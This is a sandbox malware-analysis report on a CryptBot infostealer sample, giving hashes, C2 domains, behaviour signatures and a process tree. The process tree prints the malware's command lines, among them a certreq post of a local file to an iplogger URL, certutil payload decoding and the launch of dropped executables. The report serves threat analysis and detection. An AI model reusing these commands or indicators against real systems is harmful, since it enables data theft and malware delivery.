Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/03/2025, 00:27

General

  • Target

    021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe

  • Size

    1.8MB

  • MD5

    d8a8599e2325010e356d1bf13395e0af

  • SHA1

    689a59ba3a0c4cfcbae7201cc09a986bc968b8f2

  • SHA256

    021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba

  • SHA512

    a56632b88a8b5e2bb938ee68a6a672650d2386ea18975b9d58156f2ad9efac5e4d6fa574e4c28a213cffd5c44c0355c5005e04b9801c92fe2ceef4a342e08799

  • SSDEEP

    49152:6sOXm4VF5ZCVpSm3/gjkl0+827d/GpncQ:6nxwDf3IjX27ocQ

Malware Config

Extracted

Family

cryptbot

C2

nkoopw11.top

moraass08.top

Signatures

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • CryptBot payload 2 IoCs
  • Cryptbot family
  • Manipulates Digital Signatures 1 TTPs 3 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Deobfuscate/Decode Files or Information 1 TTPs 2 IoCs

    Payload decoded via CertUtil.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe
    "C:\Users\Admin\AppData\Local\Temp\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo UfkgJKZQP
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3320
      • C:\Windows\SysWOW64\certreq.exe
        certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3216
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < OLicGk.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4208
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 1 ALq.Iqg
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3008
        • C:\Windows\SysWOW64\certutil.exe
          certutil -decode gvceXcfUhq.com U
          4⤵
          • Manipulates Digital Signatures
          • Deobfuscate/Decode Files or Information
          • System Location Discovery: System Language Discovery
          PID:2100
        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com
          msdtc.com U
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4044
          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com
            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com U
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:4028
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              6⤵
              • Executes dropped EXE
              PID:408
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious use of FindShellTrayWindow
              PID:1924
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 3
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1660
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < iphPyYJYUVPAWekxoF.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5040
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1108
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 1 ovPEN.QDIv
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2936
        • C:\Windows\SysWOW64\certutil.exe
          certutil -decode QrHZW.com T
          4⤵
          • Deobfuscate/Decode Files or Information
          • System Location Discovery: System Language Discovery
          PID:3524
        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com
          lsm.com T
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1340
          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com
            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com T
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:4172
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:3764
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\sxfisxvsjwl.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2732
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\kqvspsntve.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1372
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 3
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3276

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\OLicGk.com

    Filesize

    2KB

    MD5

    5b26b054b239e5cdd8a52564c4dd30fa

    SHA1

    35e6270bb7ea3ecc0cf57f498a5f17f46556b7c9

    SHA256

    75e1b8cab3c3db586be98cbd92ef6faf045905f84b1734d4762307359ee4c348

    SHA512

    304e23e3b0f7c69fba53fe80ec7db08b473c32db4de6856c40babebf3e39304915e62d7ade6c3b2b95e3bc25ee2bdcdd15cc84e5b8c49f4ac13e29713f6f2939

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\QrHZW.com

    Filesize

    821KB

    MD5

    640da6e057ac8de9a2b6ba317929d4e7

    SHA1

    0a58e31adabf8476e4fd172cf84953fcc69b4e14

    SHA256

    b38b3d81ae5092431e2cf9f3300d066c2f026478560ed5260c466a7a07821169

    SHA512

    d121ae2d1cfa61164536ea706008351093ac0904c343c21d871c0ce5e0c2768244dfd0d958e09da244f004f208849479ed518e83359f3a6bcab7a86de89074c8

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\T

    Filesize

    597KB

    MD5

    c53f72e837ea0572f909e19d91e678cf

    SHA1

    9ba7fb7909541885d41a48129c7447e233b6e2ce

    SHA256

    52d870a46c1908c00976184750ed34d89d0b40f5d26f0af20934b3ed860b9238

    SHA512

    c924ea60c69e61ba7f1caa9f24873e398070849bc93ec9c7cfa4671d260fdf3212bf970cf468155aa110da34a1d5eaf7afd2d5388637eb8df9bba636556a8493

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\TEYCayDdYIwJDFmJ.com

    Filesize

    633KB

    MD5

    46758451c6c15d1c09352870a73e60cc

    SHA1

    0e9d51cc8653ca35ccdd9da42a3130637c4324f4

    SHA256

    f8612a22708c1ba366671ce4c4d46bf99201779291c475fc14d15d678af08c6d

    SHA512

    8b5759cbbc211315d643c4eff764981e955caa6090fd4fb1ea3f254c63588837fa9e437b60af44bdcae9977ea821cc01cf0bc639241540fa017d6a398358a49e

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\U

    Filesize

    622KB

    MD5

    d7e447dc959c49d3eb6248670e63398a

    SHA1

    2e4bcfb967b82bc60828e2d085341e8be79b96f5

    SHA256

    88dbe047efaffcd678d8d8fa607de8f436ef65a3526e0e10c34e29a9a19a5e03

    SHA512

    2bb9acabda08b36d856b43092cf09b8414c45e01f322a96399b7be4c0c847e99e9124c61cb398141139fca5dbf5d4466db8afe0de88bb8731917f06e1c4a9652

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\UucapEhaDdp.com

    Filesize

    120KB

    MD5

    51c9e8740229697c9cb5cfee1b8fea52

    SHA1

    003431e1689ba21b2ffc0698dd7b907abb544bca

    SHA256

    4fade13b32eb319931cb8c30c16eae8379dfafda2afa8170a37192d30c48ea79

    SHA512

    cac454e15521aee2e095be72436cb33312a7e954da9489a160985883aa8780cdf1d92c0a6f9a1c2dee33826b504d83573e7c3a90ffddd411fad6df72ecca52f7

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\gvceXcfUhq.com

    Filesize

    855KB

    MD5

    d1b5da220554ba0d23a0f3f1f7ef2db9

    SHA1

    631e49d601fe9267c9cb3a6fb9e0d2fa678227e5

    SHA256

    ab68413bb05cf334bd590b397633f4de104f4e2f67b1cf10772771313c3cc646

    SHA512

    c2a9605b966391e7ed110fc4645a6370c48022cd9aa43c039e69bc07162b5e1c424b26646ab403c5318baf1011cd042a470504cacf00e714b1b9a910387490e8

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\iphPyYJYUVPAWekxoF.com

    Filesize

    2KB

    MD5

    0ba0d0258c727b64c7505f52b1280a42

    SHA1

    4a975d76f17869cccb5385f80697e8b0594407cf

    SHA256

    e9d044d8a00fc501ba732ff6732a22372e5acc6bdf08689007c6876874273764

    SHA512

    bdf446185c829317b56e62758890e04a01d4b4da0df3eb2ffdd59216f9d93144d3d1f96d503c0e917b805e21dfa05e7627b5bd44fda230ad78f16116d6b38b72

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com

    Filesize

    921KB

    MD5

    7098bdf41092092927874259196e5d80

    SHA1

    7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

    SHA256

    140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

    SHA512

    dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe

    Filesize

    76KB

    MD5

    9d2eb13476b126cb61b12cdd03c7dca6

    SHA1

    94eef82037135c46afadd641c58f8d46e2399c2b

    SHA256

    531a1b65e4e3869d65d2eaf6b07c92a34dd6fe18ed9a647bd1a257ab3d0c1aeb

    SHA512

    2bc9bb27fea55ed715f977223efd36999e22b1d86acf19a0715df65e15fd01023d7f12e63e83db792b5e2bf27b0824de542e486fbb183d5df7142b44ab59d089

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\yZwIFsEsLlrEAM.com

    Filesize

    921KB

    MD5

    392e5cc019e763f0019337277db81081

    SHA1

    9402765f17c7e2b0cf15520ffef56476a855ab2c

    SHA256

    852ed04ac131800dae464471a51a7d54063dad88ce1ebab7ce22fcab66900d01

    SHA512

    4e0de123e4ff6f40bacded145bc0505a73a2cf39ff01878b8703b1dd6fc0059d4ce1e39c0d6043b389b7ecee0126e326c6e258b0bf472bf297179b3b945db553

  • C:\Users\Admin\AppData\Local\Temp\TntHipOZP8\_Files\_Information.txt

    Filesize

    7KB

    MD5

    4b26e6a8fba5cadd97c25b4523308be3

    SHA1

    0c32b5973c3f2f23ecafe59a10c3381251c9372b

    SHA256

    c03b231e0c172717d588ae9e97e25aad8e10a7152d709219fd79f36b6cc149e8

    SHA512

    20e734c1bf539e60354eeead7d1a00b4d58fbc2faa4af744980d2bcaab19e0350b0539af28a586b7e9766fa6d4c53fb7d364a896141caa6b7a92b18a7c9557bf

  • C:\Users\Admin\AppData\Local\Temp\TntHipOZP8\_Files\_Screen_Desktop.jpeg

    Filesize

    47KB

    MD5

    b48be4c6cdc8309eb3e2506f75d9c26d

    SHA1

    4ab2f5606c95606db52a1481f5b5166d962b7fe8

    SHA256

    90fc60bafc571b10ad94c8a8877a16e307239687b0a51fbec76a8e65a7811b93

    SHA512

    1cfb0d257d6ec212d9ba9c68b5ecbf41fba51cdd090a768e50086237f3502d5322f0c13de98602633e06daaaf782ec12eca054ca0c084394d8a708355341629d

  • C:\Users\Admin\AppData\Local\Temp\TntHipOZP8\files_\system_info.txt

    Filesize

    7KB

    MD5

    65ef8065976b109f7dceb8ded9cc3d67

    SHA1

    cc5f8ca538b03adb5c390c6f8d86c3434044943c

    SHA256

    1be241ebbc4a04f562ad0cf68128999a8abea7ec5a10209e9f54b4252c6cc632

    SHA512

    bd313463e463140dee55bb92c4cf4eb97ba221dca8a58b0652c6fbd7d7006ec362e282731945aa08e8434400f5bc9d52710f7a66e9d6e73daca95eed9d414357

  • C:\Users\Admin\AppData\Local\Temp\TntHipOZP8\qzQTXaK5BZYiy.zip

    Filesize

    41KB

    MD5

    1311002ae1f2fdb3390eeb72ca98c13e

    SHA1

    cadc6a0bf2d28059043f7eaa6523c1095c0f55f0

    SHA256

    1bfeaee61b3ae9e5e3f3f75d5f41bd1b8945079e6dac04319e742a904adb87ab

    SHA512

    96899a34b6e68a3e499bfd3cea0a58dfc02993a75ac2439a7e6583958916df246f23ac557b2fdffedc88b03502a164b2b7e9b7f3aef9c9f1b361d60ad731ab04

  • memory/1924-44-0x0000000000400000-0x00000000004A3000-memory.dmp

    Filesize

    652KB

  • memory/1924-42-0x0000000000400000-0x00000000004A3000-memory.dmp

    Filesize

    652KB

  • memory/3764-261-0x0000000000400000-0x0000000000423000-memory.dmp

    Filesize

    140KB

  • memory/3764-263-0x0000000000400000-0x0000000000423000-memory.dmp

    Filesize

    140KB